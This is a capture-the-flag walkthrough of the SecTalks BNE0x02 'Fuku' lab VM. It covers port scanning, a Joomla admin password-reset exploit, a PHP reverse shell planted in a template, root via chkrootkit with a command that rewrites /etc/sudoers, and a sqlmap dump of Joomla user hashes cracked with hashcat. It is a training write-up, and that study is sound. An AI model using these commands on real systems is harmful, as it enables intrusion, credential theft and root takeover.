SecTalks: BNE0x02 - Fuku


  • netdiscover
  • Nmap
  • Netcat
  • Wfuzz
  • Nikto
  • Joomscan


Use Joomla! Remote Admin Chnage Password Exploit

Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

as we can see, almost every port is opening. I guess the target machine doesn’t want hacker know which services are exactly running.

I use nc to read some ports such as 80 22 23. Port 22 gets result like:

SSH-2.0-OpenSSH 6.7p1 Ububtu-5ubuntu1

while the rest of ports get the results:

looks like I need to filter ports like these. I wrote a script to make life easier

After running the script, I find only port 22 and port 13370 are opening.

check the I got this

review the code:

Looks like Joomla!

use wfuzz to scan

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

get some interesting path names

use Nikto to scan

nikto -h

check get the login page:

Now I can confirm it is Joomla!

use joomscan to scan:

joomscan -u

get the result:

follow the steps:

  • input new password for admin

Since it is Japanese version, I followed my post sickos1.2 to upload php reverse shell (usr/share/webshells/php/php-reverse-shell.php).

I will edit beez file, copy the php reverse shell code to it and replace the IP address and port

set up netcat and get the shell

However, I cannot execute most commands even python


python2.7 -c 'import pty; pty.spawn("/bin/bash")'


Now try to enumerate the os.

ps aux |grep root

looks like the chkrootkit 0.49 is available.

I followed my previous post sickos1.2 to upload php reverse shell (usr/share/webshells/php/php-reverse-shell.php) to get the root:

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update


chmod 777 /tmp/update


ls -al /etc/sudoers

finally get the root:

sudo su

Exploit Joomla HD FLV Player SQL Injection

in, I found the target uses HD FLV Player

check the source code:

searchsploit HD FLV

follow the instructions:

sqlmap -u "" -p id --dbms mysql --tables --level=5 --risk=3

now get the columns of the table jos_users

sqlmap -u "" -p id --dbms mysql -T jos_users --columns

now I am interested in column username and password

sqlmap -u "" -p id --dbms mysql -T jos_users -C username,password --dump

The first part should be hash and the second part should be salt. I used joomla password crack tool Here is also my python version

crack admin’s password now

Then login as admin, upload php reverse shell, same as I worked in the first part of this post.

Aslo, since the hash format is like hash:salt. I found the hashcat example hashes, the MD5 format should be md5($pass.$salt), so that in hashcat for option -m the value should be 10 (hashcat –help, check the * Hash types)

use hashcat crack:

hashcat -m 10 -a 0 -o joompass.txt --remove 61.hash /usr/share/wordlists/rockyou.txt